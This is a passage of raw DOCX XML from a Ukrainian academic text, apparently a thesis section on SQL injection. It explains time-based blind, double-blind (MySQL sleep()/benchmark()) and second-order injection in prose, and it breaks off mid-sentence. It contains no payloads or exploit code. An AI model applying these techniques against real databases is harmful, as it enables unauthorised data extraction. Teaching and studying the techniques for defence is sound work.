        </w:rPr>
        <w:t xml:space="preserve">, атакуючий може вилучити ім’я бази даних використовуючи метод </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF981D3" w14:textId="0E838E21" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакуючий може використати </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>brute</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>force</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (повний перебір) імен баз даних використовуючи час перед виконанням запиту і встановлення часу після його виконання; тоді атакуючий може оцінити від результату, якщо проміжок часу становить 10 секунд тоді ім’я може бути ‘A’; інакше, якщо це займає 2 секунди, тоді воно не може бути ‘A’. Так само, атакуючий з’ясовує ім’я бази даних асоціювавши з цільовим додатком. [2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF66F31" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5214883C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00AB53FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc516752143"/>
      <w:bookmarkStart w:id="78" w:name="_Toc30433128"/>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6.6 Виконання </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Double</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Класична експлуатація (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB530A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456DA064" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Double-Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> також називається </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94F83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>time-based SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. В </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, атакуючий вставляє час затримки в SQL запит обробляючи до пошуку символи в базі даних користувачів, імен баз даних, імена стовпців, дані рядка. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEFC9D" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Якщо запит з часовою затримкою виконується негайно, тоді умова вставлення в запиті є хибною. Якщо запит виконується з деякою затримкою, тоді умова вставлення в запиті є істиною. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691DD62B" w14:textId="094DD191" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В даній </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> техніці записи читаються символом за символом. На відміну від інших </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> технік, ця техніка не використовує UNION або інші техніки у вставленому запиті. [2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00CE4163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE263C" w14:textId="281C91E4" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Double</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> експлуатація залежить від часу затримки. Експлуатація починається з відправки з часової затримки до веб додатку і отримання відповіді назад. В типовій </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаці, функція </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>benchmark</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">() і </w:t>
      </w:r>
      <w:r w:rsidRPr="009671F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>() використовує процес затримки часу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B15A501" w14:textId="3867F4A6" w:rsidR="008B0B5B" w:rsidRPr="00355D23" w:rsidRDefault="008B0B5B" w:rsidP="00355D23">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FA398C" w14:textId="56501716" w:rsidR="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc30433129"/>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.</w:t>
      </w:r>
      <w:r w:rsidR="00101F0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB53FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0019135A" w:rsidRPr="0019135A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Використання ін'єкції SQL другого порядку</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="6EF47046" w14:textId="328416C8" w:rsidR="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFD93E2" w14:textId="3E0EABCE" w:rsidR="00A419FD" w:rsidRDefault="0019135A" w:rsidP="00101F0F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Second</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Order</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> може бути зроблена коли додаток використовує дані, введені користувачем для виконання різних функцій програми. Для виконання цього типу </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкції, зловмисник повинен знати, як представлені значення використовуються пізніше в додатку</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ця атака навіть можлива коли додаток використовує метод відмови від виводу, щоб прийняти вхідні дані від користувачів</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Зловмисник подає шкідливий запит із запитаним запитом, але не завдає шкоди застосуванню, оскільки вихід вичерпується</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Цей запит зберігатиметься в базі як частина функціональності додатків. Пізніше, коли інші функції додатків використовують той самий запит збережений в базі даних для виконання іншої операції, зловмисний запит виконується, дозволяючи атакуючому виконати </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
